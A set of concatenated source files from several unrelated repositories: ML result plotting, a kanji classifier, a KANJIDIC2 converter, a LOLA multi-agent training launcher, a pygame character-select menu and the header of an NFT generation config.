# special_layer_counts = [model_name.split("_")[0] for model_name in models]
# dense_layer_counts = [model_name.split("_")[3] for model_name in models]
# inflation types
y_labels_cnn = ["0 conv2d layers",
"1 conv2d layer",
"2 conv2d layers"]
x_labels_cnn = ["inflating, 3",
"deflating, 3",
"inflating, 7",
"deflating, 7"]
def f_cnn(x_in, y_in, fixed_value):
tmp = get_score(
"{}_conv_layers_{}_kernel_size_{}".format(
int(y_in),
("inflating" if x_in % 2 == 0 else "deflating"),
(-1 if y_in == 0 else (3 if (x_in // 2) % 2 == 0 else 7))
),
fixed_value
)
return tmp if tmp > 0 else 0.1
plot_scores_of_one_model_in_3d(
"mean achieved {}\nCNN models on circuit '{}'".format(metric, circuit), x_labels_cnn, y_labels_cnn, 'layer dimensions, conv2d kernel size', 'layers',
metric,
f_cnn, (circuit, metric), get_score("reference", (circuit, metric)) if reference else None
)
y_labels_rnn = ["(1, 1)",
"(1, 2)",
"(2, 1)",
"(2, 2)",
"(3, 1)",
"(3, 2)"]
x_labels_rnn = ["inflating",
"deflating",
"bloating"]
def f_rnn(x_in, y_in, fixed_value):
tmp = get_score(
"{}_lstm_layers_{}_dense_layers_{}".format(
int(y_in) // 2 + 1,
int(y_in) % 2 + 1,
("inflating" if x_in == 0 else "deflating" if x_in == 1 else "bloating")
),
fixed_value
)
return tmp if tmp > 0 else 0.1
plot_scores_of_one_model_in_3d(
"mean achieved {}\nRNN models on circuit '{}'".format(metric, circuit), x_labels_rnn, y_labels_rnn, 'layer dimensions', 'lstm layers, dense layers',
metric,
f_rnn, (circuit, metric), get_score("reference", (circuit, metric)) if reference else None
)
print("reference value for {}: {}".format(metric, get_score("reference", (circuit, metric))))
def plot_scores_of_one_model_in_3d(title,
x_labels: list, y_labels: list, x_axis_label: str, y_axis_label: str, z_axis_label: str,
mapping_func, fixed_value, reference_value):
# def symlog_shift(arr, shift=0):
# # shift array-like to symlog array with shift
# logv = np.abs(arr) * (10. ** shift)
# logv[np.where(logv < 1.)] = 1.
# logv = np.sign(arr) * np.log10(logv)
# return logv
#
# def symlog_shift_ticks(tks1, tks2, tks3, shift=0):
# # generate the tick position and the corresponding tick labels in symlog scale with shift
# # tks1, tks2, tks3: tick values in log scale
#
# # tick positions to show in graph
# tkps = [-v - shift for v in tks1] + tks2 + [v + shift for v in tks3]
# # tkck labels in str
# tkls = ['$-10^{%d}$' % (v) for v in tks1] + [''] + ['$10^{%d}$' % (v) for v in tks3]
# return tkps, tkls
def color(val):
return cm.coolwarm(val)
SHIFT = 1
x = np.linspace(0, len(x_labels)-1, len(x_labels)) # number of augmentation methods
y = np.linspace(0, len(y_labels)-1, len(y_labels))
X, Y = np.meshgrid(x, y)
x_flat = X.flatten()
y_flat = Y.flatten()
Z = [mapping_func(x_flat[i], y_flat[i], fixed_value) for i in range(len(x_labels)*len(y_labels))]
Z = np.reshape(Z, (len(y_labels), len(x_labels)))
# Z = symlog_shift(Z,shift=SHIFT)
# ztkps, ztkls = symlog_shift_ticks([2, 1, 0, -1], [0], [-1, 0, 1, 2], shift=SHIFT)
Z_colors = np.array([[color(z) for z in row] for row in Z]).reshape(Z.shape + (-1,))
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.set_xticks(range(len(x_labels)))
ax.set_xticklabels(x_labels, horizontalalignment='right')
ax.set_yticks(range(len(y_labels)))
ax.set_yticklabels(y_labels, horizontalalignment='left')
# ax.set_zticks(ztkps)
# ax.set_zticklabels(ztkls)
if reference_value is not None:
Z_const = [reference_value for i in range(len(x_labels) * len(y_labels))]
Z_const = np.reshape(Z_const, (len(y_labels), len(x_labels)))
ax.plot_surface(X, Y, Z_const, label='reference score', rstride=1, cstride=1,
cmap='viridis', edgecolor='none')
ax.plot_surface(X, Y, Z, rstride=1, label='achieved score', cstride=1,
cmap='viridis', edgecolor='none')
# ax.set_title('evaluation on model \"{}\"'.format(model.__str__()))
ax.set_title(title)
ax.set_xlabel(x_axis_label, labelpad=16)
ax.set_ylabel(y_axis_label, labelpad=2)
ax.set_zlabel(z_axis_label)
# ax.set_zlim((0, 5))
# ax.set_zbound((0, 5))
ax.tick_params(labelsize=6)
ax.tick_params(axis='x', pad=-4)
ax.tick_params(axis='y', rotation=350, pad=-4)
ax.view_init(30, 330)
plt.show()
def print_result_table(circuit):
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "lstm" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
dict_lstm = dict(
zip(
tuples,
[
{
"channel_width": round(float(np.median(np.asarray(runtime_quality_map[key][2][0]))), 2),
"critical_path_ns": round(float(np.median(np.asarray(runtime_quality_map[key][2][1]))), 2)
}
for key
in keys
]
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['lstm_layer_count', 'dense_layer_count', 'structure'])
df = pd.DataFrame(dict_lstm, columns=index).transpose()
df.to_latex("model_selection_lstm_performance_table_{}_latex.txt".format(circuit))
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "conv" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
dict_cnn = dict(
zip(
tuples,
[
{
"channel_width": round(float(np.median(np.asarray(runtime_quality_map[key][2][0]))), 2),
"critical_path_ns": round(float(np.median(np.asarray(runtime_quality_map[key][2][1]))), 2)
}
for key
in keys
]
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['conv_layer_count', 'structure', 'kernel_size'])
df = pd.DataFrame(dict_cnn, columns=index).transpose()
df.to_latex("model_selection_cnn_performance_table_{}_latex.txt".format(circuit))
def print_result_table_full(circuit):
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "lstm" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
row_tuples = [("channel_width", "1"),
("channel_width", "2"),
("channel_width", "3"),
("channel_width", "mean"),
("critical_path", "1"),
("critical_path", "2"),
("critical_path", "3"),
("critical_path", "mean")]
values = [
{
("channel_width", "1"): round(runtime_quality_map[key][2][0][0], 2),
("channel_width", "2"): round(runtime_quality_map[key][2][0][1], 2),
("channel_width", "3"): round(runtime_quality_map[key][2][0][2], 2),
("channel_width", "mean"): round(float(np.asarray(runtime_quality_map[key][2][0]).mean()), 2),
("critical_path", "1"): round(runtime_quality_map[key][2][1][0], 2),
("critical_path", "2"): round(runtime_quality_map[key][2][1][1], 2),
("critical_path", "3"): round(runtime_quality_map[key][2][1][2], 2),
("critical_path", "mean"): round(float(np.asarray(runtime_quality_map[key][2][1]).mean()), 2)
}
for key
in keys
]
dict_eval = dict(
zip(
tuples,
values
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['lstm_layer_count', 'dense_layer_count', 'structure'])
index_rows=pd.MultiIndex.from_tuples(row_tuples, names=['metric', 'attempt'])
df = pd.DataFrame(dict_eval, columns=index, index=index_rows).transpose()
print(df)
df.to_latex("model_selection_lstm_performance_table_{}_latex_full.txt".format(circuit))
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "conv" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
row_tuples = [("channel_width", "1"),
("channel_width", "2"),
("channel_width", "3"),
("channel_width", "mean"),
("critical_path", "1"),
("critical_path", "2"),
("critical_path", "3"),
("critical_path", "mean")]
values = [
{
("channel_width", "1"): round(runtime_quality_map[key][2][0][0], 2),
("channel_width", "2"): round(runtime_quality_map[key][2][0][1], 2),
("channel_width", "3"): round(runtime_quality_map[key][2][0][2], 2),
("channel_width", "mean"): round(float(np.asarray(runtime_quality_map[key][2][0]).mean()), 2),
("critical_path", "1"): round(runtime_quality_map[key][2][1][0], 2),
("critical_path", "2"): round(runtime_quality_map[key][2][1][1], 2),
("critical_path", "3"): round(runtime_quality_map[key][2][1][2], 2),
("critical_path", "mean"): round(float(np.asarray(runtime_quality_map[key][2][1]).mean()), 2)
}
for key
in keys
]
dict_eval = dict(
zip(
tuples,
values
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['conv_layer_count', 'structure', 'kernel_size'])
index_rows=pd.MultiIndex.from_tuples(row_tuples, names=['metric', 'attempt'])
df = pd.DataFrame(dict_eval, columns=index, index=index_rows).transpose()
print(df)
df.to_latex("model_selection_cnn_performance_table_{}_latex_full.txt".format(circuit))
def print_best_model(circuit):
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
results = [(key, runtime_quality_map[key][2][0]) for key in keys]
results = [(key, np.median(np.asarray(value))) for key, value in results]
results_rnn = [(key, value) for key, value in results if "lstm" in key[0]]
values_rnn = [value for key, value in results_rnn]
result_rnn = [key for key, value in results_rnn if value == min(values_rnn)]
print(result_rnn)
print("best rnn: {} with channel_width {}".format(
result_rnn[0] if len(result_rnn) == 1 else result_rnn[1], min(values_rnn)) # does not change optimality of choice, but produces the chosen best_rnn on present data...
)
results_cnn = [(key, value) for key, value in results if "conv" in key[0]]
values_cnn = [value for key, value in results_cnn]
result_cnn = [key for key, value in results_cnn if value == min(values_cnn)]
print(result_cnn)
print("best cnn: {} with channel_width {}".format(
result_cnn[0] if len(result_cnn) == 1 else result_cnn[1], min(values_cnn))
)
if __name__ == "__main__":
plot_model_scores_over_hyperparams(eval_circuits[0], "channel_width", reference=True)
plot_model_scores_over_hyperparams(eval_circuits[0], "critical path length (ns)", reference=True)
print_result_table(eval_circuits[0])
print_result_table_full(eval_circuits[0])
print_best_model(eval_circuits[0])
``` |
{
"source": "011000101101/VRAR_project",
"score": 3
} |
#### File: VRAR_project/classifier_subsystem/model.py
```python
import numpy as np
import os
import cv2
import pickle
from sklearn import neighbors
from utils.params import *
from utils.image_augmenting import add_noise_greyscale
def train(model, X, y, name: str):
"""
train a model on the given training set and optionally save it to disk
:param model: the model to train
:param X: the sample images, list of numpy arrays (greyscale images)
:param y: the target labels, list of strings (kanji)
:param name: name of the model used to save it on disk, or None if it is not to be saved
:return: the trained model
"""
# reshape X to 2d
X = np.asarray(X)
X = X.reshape((X.shape[0], -1))
print("fitting on {} samples".format(len(y)))
# train the model
print("begin fitting")
model.fit(X, y)
print("done fitting")
# optionally save trained model
if name is not None:
with open("trained_{}.pkl".format(name), 'wb') as f:
pickle.dump(model, f, pickle.HIGHEST_PROTOCOL)
return model
def evaluate(model_or_name, X, y, interactive: bool = False):
"""
evaluate a model on the given evaluation set
:param model_or_name: either the model itself, or the name of a pretrained and saved model as string
:param X: the sample images, list of numpy arrays (greyscale images)
:param y: the target labels, list of strings (kanji)
:param interactive: flag to visually explore the evaluation set and the predictions made
:return: performance score as number of samples given and number of correct predictions made
"""
# get model
if isinstance(model_or_name, str): # name of model passed...
# load from disk
with open("trained_{}.pkl".format(model_or_name), 'rb') as f:
model = pickle.load(f)
else: # model passed directly...
model = model_or_name # use
correct = 0
print("evaluating on {} samples...".format(len(X)))
# for each sample image in evaluation set
for index in range(len(X)):
# predict the kanji it depicts
Z = model.predict(X[index].reshape((1, -1)))
# count correct predictions
if Z[0] == y[index]:
correct += 1
# interactively explore sample images and predictions
if interactive:
            cv2.imshow("asdf", X[index])
            cv2.waitKey()
            cv2.destroyAllWindows()
print(Z)
print(y[index])
print("correct" if Z[0] == y[index] else "wrong")
print("\n")
print("finished evaluating.")
# return total number of predictions made and number of correct predictions
return len(X), correct
def predict(model, X: np.ndarray) -> str:
"""
predicts the kanji for a single image
:param model: the classifier model
:param X: the sample image, 2d numpy array (greyscale)
    :return: the predicted label/kanji
"""
return model.predict(X.reshape((1, -1)))
```
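A minimal usage sketch for the helpers above — not part of the repository; it assumes the module is importable as `classifier_subsystem.model` (per the file header) and that greyscale samples are available. The k-NN settings and the dummy data are illustrative only.
```python
import numpy as np
from sklearn import neighbors

from classifier_subsystem.model import train, evaluate, predict  # assumed module path

# Illustrative data: 100 random 32x32 greyscale "images" with two dummy labels.
X = [np.random.randint(0, 256, (32, 32), dtype=np.uint8) for _ in range(100)]
y = ["火" if i % 2 else "水" for i in range(100)]

# Any sklearn estimator with fit/predict works here; k-NN is just an example.
knn = neighbors.KNeighborsClassifier(n_neighbors=3)
model = train(knn, X[:80], y[:80], name=None)  # name=None skips saving to disk

total, correct = evaluate(model, X[80:], y[80:])
print("accuracy: {:.2f}".format(correct / total))
print(predict(model, X[0]))  # predicted label for a single image
```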
#### File: VRAR_project/precompute/convert_kanjidic2_to_hashtable.py
```python
import xml.etree.ElementTree as ET
import pickle
import os
from utils.params import *
import utils.stringutils as stringutils
def hiraganify_single_on_yomi(on_yomi: str):
utf8_bytes = list(on_yomi.encode("utf-8"))
kun_yomi = ""
for char in on_yomi:
if char == 'ー':
# new_char = kun_yomi[len(kun_yomi)-1]
            kun_yomi += 'あ' # TODO dirty workaround for the only occurrence of 'ー' (ダース)
continue
        # convert utf-8 string of single char to byte array holding its utf-8 codepoint
char_bytes = list(char.encode("utf-8"))
# skip non-katakana chars
if char_bytes[0] != 227:
continue
## assertion holds on full dataset
# assert (
# (char_bytes[1] == 130 and 161 <= char_bytes[2] <= 191)
# or
# (char_bytes[1] == 131 and 128 <= char_bytes[2] <= 182)
# ), "{} is not a katakana char: {}".format(char, char_bytes) # 82a1 <= ... <= 83B6
# change katakana char to equivalent hiragana char according to utf-8 codepoint table
if char_bytes[1] == 130: # 82
char_bytes[1] = 129
char_bytes[2] -= 32 # bf - 9f, distance of "ta"
elif char_bytes[1] == 131:
if char_bytes[2] < 160: # a0
char_bytes[1] = 129
char_bytes[2] += 32 # 9f - bf, distance of "mi"
else:
char_bytes[1] = 130
char_bytes[2] -= 32 # a0 - 80, distance of "mu"
else:
continue # skip non-katakana chars
# convert byte array holding utf-8 codepoint of single char back to utf-8 string
new_char = bytes(char_bytes).decode("utf-8")
# concatenate the characters
kun_yomi += new_char
return kun_yomi
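# Worked example (illustrative): 'カ' (U+30AB) encodes to the UTF-8 bytes [227, 130, 171];
# the char_bytes[1] == 130 branch sets byte 1 to 129 and subtracts 32 from byte 2,
# yielding [227, 129, 139], which decodes to the hiragana 'か' (U+304B).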
def hiraganify_on_yomi(readings_on: list):
return list(map(hiraganify_single_on_yomi, readings_on))
def isolate_actual_readings(readings_kun: list):
return [extended_reading.split('.')[0] for extended_reading in readings_kun]
def cut_non_hiragana_chars(kun_yomi: str):
utf8_bytes = list(kun_yomi.encode("utf-8"))
hiragana_only = ""
for char in kun_yomi:
if char == 'ー':
hiragana_only += 'ー'
continue
if not stringutils.is_kana(char):
continue
# concatenate the characters
hiragana_only += char
return hiragana_only
def entry_list_to_map(entries_in: list):
kanji_dict = {}
for entry in entries_in:
kanji = entry.find("literal").text
readings_on = [reading.text for reading in entry.findall("reading_meaning/rmgroup/reading[@r_type='ja_on']")]
readings_kun = [reading.text for reading in entry.findall("reading_meaning/rmgroup/reading[@r_type='ja_kun']")]
readings_nanori = [reading.text for reading in entry.findall("reading_meaning/nanori")]
readings = hiraganify_on_yomi(readings_on) + list(
map(cut_non_hiragana_chars, isolate_actual_readings(readings_kun))
)
readings_nanori = list(map(cut_non_hiragana_chars, readings_nanori))
kanji_dict[kanji] = (readings, readings_nanori)
return kanji_dict
def convert():
tree = ET.parse(os.path.join(ROOT_DIR, "resources/kanjidic2/kanjidic2.xml"))
entries = tree.findall("character")
kanji_dict_map = entry_list_to_map(entries)
with open(os.path.join(ROOT_DIR, "bin_blobs/kanjidic2_hashtable.pkl"), 'wb') as f:
pickle.dump(kanji_dict_map, f, pickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
convert()
``` |
{
"source": "011235813/lola",
"score": 2
} |
#### File: lola/scripts/run_lola.py
```python
import click
import time
from lola import logger
from lola.envs import *
import sys
sys.path.append('../../lio/env/')
from room_symmetric_lola import EscapeRoom
from room_asymmetric_lola import EscapeRoomAsym
@click.command()
# Experiment parameters
@click.option("--exp_name", type=str, default="IPD",
help="Name of the experiment (and correspondingly environment).")
@click.option("--num_episodes", type=int, default=None,
help="Number of episodes.")
@click.option("--trace_length", type=int, default=None,
help="Lenght of the traces.")
@click.option("--exact/--no-exact", default=True,
help="Whether to run the exact version of LOLA.")
@click.option("--pseudo/--no-pseudo", default=False,
help="Only used with exact version of LOLA.")
@click.option("--grid_size", type=int, default=3,
help="Grid size of the coin game (used only for coin game).")
@click.option("--trials", type=int, default=2, help="Number of trials.")
@click.option("--n_agents", type=int, default=2, help="Number of agents.")
# Learning parameters
@click.option("--lola/--no-lola", default=True,
help="Add the crazy LOLA corrections to the computation.")
@click.option("--opp_model/--no-opp_model", default=False,
help="Whether to model opponent or use true parameters "
"(use only for coin game).")
@click.option("--mem_efficient/--no-mem_efficient", default=True,
help="Use a more memory efficient corrections method.")
@click.option("--lr", type=float, default=None,
help="Learning rate for Adam optimizer.")
@click.option("--lr_correction", type=float, default=1,
help="Learning rate for corrections.")
@click.option("--batch_size", type=int, default=None,
help="Number of episodes to optimize at the same time.")
@click.option("--bs_mul", type=int, default=1,
help="Number of episodes to optimize at the same time")
# Policy parameters
@click.option("--simple_net/--no-simple_net", default=True,
help="Use a simple policy (only for IPD and IMP).")
@click.option("--hidden", type=int, default=32,
help="Size of the hidden layer.")
@click.option("--num_units", type=int, default=64,
help="Number of units in the MLP.")
@click.option("--reg", type=float, default=0.,
help="Regularization parameter.")
@click.option("--gamma", type=float, default=None,
help="Discount factor.")
# Escape room parameters
@click.option("--sym/--asym", default=True,
help="Symmetric Escape Room.")
@click.option("--reward_type", type=str, default="continuous",
help="Continuous or discrete reward-giving actions.")
@click.option("--dirname", type=str, default="er-dc",
help="subfolder name to save log files.")
def main(exp_name, num_episodes, trace_length, exact, pseudo, grid_size,
trials, lr, lr_correction, batch_size, bs_mul, simple_net, hidden,
num_units, reg, gamma, lola, opp_model, mem_efficient, n_agents,
sym, reward_type, dirname):
# Sanity
assert exp_name in {"CoinGame", "IPD", "IMP", "escape-room"}
# Resolve default parameters
if exact:
num_episodes = 50 if num_episodes is None else num_episodes
trace_length = 200 if trace_length is None else trace_length
lr = 1. if lr is None else lr
elif exp_name in {"IPD", "IMP"}:
num_episodes = 600000 if num_episodes is None else num_episodes
trace_length = 150 if trace_length is None else trace_length
batch_size = 4000 if batch_size is None else batch_size
lr = 1. if lr is None else lr
elif exp_name == "CoinGame":
num_episodes = 100000 if num_episodes is None else num_episodes
trace_length = 150 if trace_length is None else trace_length
batch_size = 4000 if batch_size is None else batch_size
lr = 0.005 if lr is None else lr
elif exp_name == "escape-room":
num_episodes = 50000 if num_episodes is None else num_episodes
trace_length = 5 if trace_length is None else trace_length
batch_size = 50 if batch_size is None else batch_size
lr = 1. if lr is None else lr
# Import the right training function
if exact:
assert exp_name != "CoinGame", "Can't run CoinGame with --exact."
def run(env):
from lola.train_exact import train
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
simple_net=simple_net,
corrections=lola,
pseudo=pseudo,
num_hidden=hidden,
reg=reg,
lr=lr,
lr_correction=lr_correction,
gamma=gamma)
elif exp_name in {"IPD", "IMP"}:
def run(env):
from lola.train_pg import train
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
batch_size=batch_size,
gamma=gamma,
set_zero=0,
lr=lr,
corrections=lola,
simple_net=simple_net,
hidden=hidden,
mem_efficient=mem_efficient)
elif exp_name == "CoinGame":
def run(env):
from lola.train_cg import train
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
batch_size=batch_size,
bs_mul=bs_mul,
gamma=gamma,
grid_size=grid_size,
lr=lr,
corrections=lola,
opp_model=opp_model,
hidden=hidden,
mem_efficient=mem_efficient)
elif exp_name == "escape-room":
def run(env, logdir):
if not sym:
from lola.train_er_asym import train
else:
if reward_type == 'continuous':
from lola.train_er_discrete_continuous import train
elif n_agents == 2:
from lola.train_er import train
elif n_agents == 3:
from lola.train_er_3player import train
else:
raise ValueError("Only 2 or 3 agents are supported for Escape Room.")
train(env,
num_episodes=num_episodes,
trace_length=trace_length,
batch_size=batch_size,
gamma=gamma,
set_zero=0,
lr=lr,
corrections=lola,
simple_net=simple_net,
hidden1=64,
hidden2=32,
mem_efficient=mem_efficient,
logdir=logdir)
# Instantiate the environment
if exp_name == "IPD":
env = IPD(trace_length)
gamma = 0.96 if gamma is None else gamma
elif exp_name == "IMP":
env = IMP(trace_length)
gamma = 0.9 if gamma is None else gamma
elif exp_name == "CoinGame":
env = CG(trace_length, batch_size, grid_size)
gamma = 0.96 if gamma is None else gamma
elif exp_name == "escape-room":
gamma = 0.99 if gamma is None else gamma
if not sym:
env = EscapeRoomAsym(trace_length)
else:
if reward_type == 'continuous':
# giving rewards is handled outside env for the
# case of continuous reward-giving actions
env = EscapeRoom(trace_length, n_agents,
incentivization_inside_env=False)
else:
env = EscapeRoom(trace_length, n_agents,
incentivization_inside_env=True)
# Run training
# for seed in range(trials):
for seed in range(0, 1):
# logdir = 'logs/{}/seed-{}'.format(exp_name, seed)
# logdir = 'logs/{}/inexact-seed-{}'.format(exp_name, seed)
# logdir = 'logs/{}/lr0p1-{}'.format(exp_name, seed)
# logdir = 'logs/{}/n{}-lr10-{}'.format(exp_name, n_agents, seed)
logdir = 'logs/{}/n{}-lr{}-{}'.format(
dirname, n_agents, str(lr).replace('.', 'p'), seed)
logger.configure(dir=logdir)
start_time = time.time()
run(env, logdir)
# run(env)
end_time = time.time()
logger.reset()
if __name__ == '__main__':
main()
``` |
{
"source": "0112leesy/2021-2-OSSProj-PlusAlpha-9",
"score": 4
} |
#### File: 2021-2-OSSProj-PlusAlpha-9/boss/Bullet.py
```python
from math import *
import pygame
from object.Object import Object
from pygame.math import Vector2
# Bullet class for the boss's projectiles
class Bullet(Object): #extend Object
def __init__(self, img_path, size, velocity, fire_loc, target_loc):
super().__init__(img_path, size, velocity)
#calculate direction from fire_loc to target_loc
if((sqrt((target_loc[0] - fire_loc[0]) ** 2 + (target_loc[1] - fire_loc[1]) ** 2)) == 0):
self.dx=1
self.dy=1
else:
self.dx = int((velocity) * (target_loc[0] - fire_loc[0]) /
(sqrt((target_loc[0] - fire_loc[0]) ** 2 +
(target_loc[1] - fire_loc[1]) ** 2)))
self.dy = int((velocity) * (target_loc[1] - fire_loc[1]) /
(sqrt((target_loc[0] - fire_loc[0]) ** 2 +
(target_loc[1] - fire_loc[1]) ** 2)))
self.calc_dir(self.dx, self.dy)
self.x = fire_loc[0]
self.y = fire_loc[1]
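    # Worked example (illustrative): with fire_loc=(0, 0), target_loc=(3, 4) and velocity=10,
    # the distance is 5, so dx = int(10 * 3 / 5) = 6 and dy = int(10 * 4 / 5) = 8,
    # i.e. the velocity is scaled onto the unit direction pointing at the target.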
def move(self,boundary,game): #move bullet
if (game.size[0] != self.boundary[0]) or (game.size[1] != self.boundary[1]):
self.on_resize(game)
self.calc_dir(self.dx, self.dy)
self.x += self.dx
self.y += self.dy
self.update_rect((self.x, self.y))
if self.y >= boundary[1] - self.sy or self.x>=boundary[0]-self.sx or self.x<0 or self.y< 0: #remove bullet if OOB
game.enemyBullets.remove(self)
def calc_dir(self, dx, dy):
direction = Vector2(dx,dy)
radius, angle = direction.as_polar()
self.img = pygame.transform.rotozoom(self.img, -angle - 90.0, 1)
```
#### File: 2021-2-OSSProj-PlusAlpha-9/menu/CharacterSelectMenu.py
```python
import pygame
import pygame_menu
from data.CharacterDataManager import *
from data.Defs import *
from data.Stage import Stage
from data.StageDataManager import *
from game.InfiniteGame import *
from game.StageGame import StageGame
from pygame_menu.baseimage import IMAGE_MODE_FILL, IMAGE_MODE_SIMPLE
from pygame_menu.locals import ALIGN_LEFT, ALIGN_RIGHT
from pygame_menu.utils import make_surface
# Character selection menu
class CharacterSelectMenu(pygame_menu.menu.Menu):
image_widget: 'pygame_menu.widgets.Image'
item_description_widget: 'pygame_menu.widgets.Label'
def __init__(self,screen,attr):
        # Receive the screen and read its size
self.screen = screen
self.size = screen.get_size()
menu_image = pygame_menu.baseimage.BaseImage(image_path='./Image/StartImage.png',drawing_mode=pygame_menu.baseimage.IMAGE_MODE_FILL)
mytheme = pygame_menu.themes.THEME_ORANGE.copy()
mytheme.background_color = menu_image
super().__init__('Select Character...', self.size[0], self.size[1],
theme=mytheme)
        # The selected stage (or mode)
        self.attr = attr
        # Load the character data from JSON
self.character_data = CharacterDataManager.load()
self.show()
self.mainloop(self.screen,bgfun = self.check_resize)
def to_menu(self):
self.disable()
    # Build the menu and show it
def show(self):
        # Build the character selection menu
characters = []
for idx in range(len(self.character_data)):
characters.append((self.character_data[idx].name, idx))
self.character_imgs = []
for idx in range(len(self.character_data)):
default_image = pygame_menu.BaseImage(
image_path=self.character_data[idx].img_path
).scale(0.5, 0.5)
self.character_imgs.append(default_image.copy())
self.character_selector = self.add.selector(
title='Character :\t',
items=characters,
onchange=self.on_selector_change
)
self.image_widget = self.add.image(
image_path=self.character_imgs[0],
padding=(25, 0, 0, 0) # top, right, bottom, left
)
self.item_description_widget = self.add.label(title = "Unlocked" if self.character_data[0].is_unlocked == True else "Locked")
self.frame_v = self.add.frame_v(350, 160, margin=(10, 0))
        # Display each character's stats
self.power = self.frame_v.pack(self.add.progress_bar(
title="Power",
default=int((self.character_data[0].missile_power/Default.character.value["max_stats"]["power"])*100),
progress_text_enabled = False,
box_progress_color = Color.RED.value
), ALIGN_RIGHT)
self.fire_rate = self.frame_v.pack(self.add.progress_bar(
title="Fire Rate",
default=int((Default.character.value["max_stats"]["fire_rate"]/self.character_data[0].org_fire_interval)*100),
progress_text_enabled = False,
box_progress_color =Color.BLUE.value
), ALIGN_RIGHT)
self.velocity = self.frame_v.pack(self.add.progress_bar(
title="Mobility",
default=int((self.character_data[0].org_velocity/Default.character.value["max_stats"]["mobility"])*100),
progress_text_enabled = False,
box_progress_color = Color.GREEN.value
), ALIGN_RIGHT)
self.add.button("PLAY",self.start_game)
# self.add.button("BACK",pygame_menu.events.BACK)
self.add.button("BACK",self.to_menu)
self.update_from_selection(int(self.character_selector.get_value()[0][1]))
    def start_game(self): # starts the game
        # Fetch the data currently selected by the character selector via get_value,
        # then take the Character object at [0][1]
        selected_idx = self.character_selector.get_value()[0][1]
        # Check whether the character is unlocked
        if (self.character_data[selected_idx].is_unlocked): # the character is unlocked
            if(isinstance(self.attr,InfiniteGame.Mode)): # a difficulty Mode object means infinite mode
                InfiniteGame(self.character_data[selected_idx],self.attr).main()
            else: # a Stage object means stage mode
                StageGame(self.character_data,self.character_data[selected_idx],self.attr).main()
else:
print("character locked")
print(self.character_data[selected_idx].name)
self.showCharactereLockedScreen(self.character_data[selected_idx].name)
    # Screen shown when a locked character is selected
def showCharactereLockedScreen(self, character):
characterlocked_theme = pygame_menu.themes.THEME_DARK.copy()
characterlocked_theme.title_bar_style = pygame_menu.widgets.MENUBAR_STYLE_SIMPLE
characterlocked_theme.title_close_button_cursor = pygame_menu.locals.CURSOR_HAND
characterlocked_theme.title_font_color = Color.WHITE.value
self.size = self.screen.get_size()
super().__init__('Character Locked!', self.size[0], self.size[1],
theme=characterlocked_theme)
if(character == 'F5S1'):
self.add.image(Images.F5S1_locked.value, scale=Scales.default.value)
elif(character == 'F5S4'):
self.add.image(Images.F5S4_locked.value, scale=Scales.default.value)
elif(character == 'Tank'):
self.add.image(Images.Tank_locked.value, scale=Scales.default.value)
self.add.label("")
self.add.button('back', self.back_from_locked)
self.mainloop(self.screen,bgfun = self.check_resize)
def back_from_locked(self):
self.disable()
self.__init__(self.screen, self.attr)
    # Detect window resizing and keep the aspect ratio fixed
    def check_resize(self):
        if (self.size != self.screen.get_size()): # update when the current size differs from the stored one
            changed_screen_size = self.screen.get_size() # the new size
            ratio_screen_size = (changed_screen_size[0],changed_screen_size[0]*783/720) # compute y proportionally from x
            if(ratio_screen_size[0]<320): # minimum width limit
                ratio_screen_size = (494,537)
            if(ratio_screen_size[1]>783): # maximum height limit
ratio_screen_size = (720,783)
self.screen = pygame.display.set_mode(ratio_screen_size,
pygame.RESIZABLE)
window_size = self.screen.get_size()
new_w, new_h = 1 * window_size[0], 1 * window_size[1]
self.resize(new_w, new_h)
self.size = window_size
self._current._widgets_surface = make_surface(0,0)
print(f'New menu size: {self.get_size()}')
    # Called when the character selection changes
def on_selector_change(self, selected, value: int) -> None:
self.update_from_selection(value)
    # Update the character image and stat widgets for the selected character
def update_from_selection(self, selected_value, **kwargs) -> None:
self.current = selected_value
self.image_widget.set_image(self.character_imgs[selected_value])
self.power.set_value(int((self.character_data[selected_value].missile_power/Default.character.value["max_stats"]["power"])*100))
self.fire_rate.set_value(int((Default.character.value["max_stats"]["fire_rate"]/self.character_data[selected_value].org_fire_interval)*100))
self.velocity.set_value(int((self.character_data[selected_value].org_velocity/Default.character.value["max_stats"]["mobility"])*100))
self.item_description_widget.set_title(title = "Unlocked" if self.character_data[selected_value].is_unlocked == True else "Locked")
``` |
{
"source": "011Xpl/3D-NFT",
"score": 2
} |
#### File: 011Xpl/3D-NFT/config.py
```python
## INPUT
#The code currently supports `.blend` files. You can use any extension that Blender supports by editing the code.
## OUTPUT
#`.png` and Metadata Jsons
## **WARNING! DON'T FORGET!**
#1. Edit `data`
#2. Edit count of `createObj`
#3. Edit the file name and the file path.
## DONATION
#Buy me a beer!
#ETH: 0x9904bFa1B183Eb9d9350A885Ddac8B1A8a80eb71
##RARITY
# weights=(10,10,10,10,10,50)
# edit this, line 153,155,157
import random
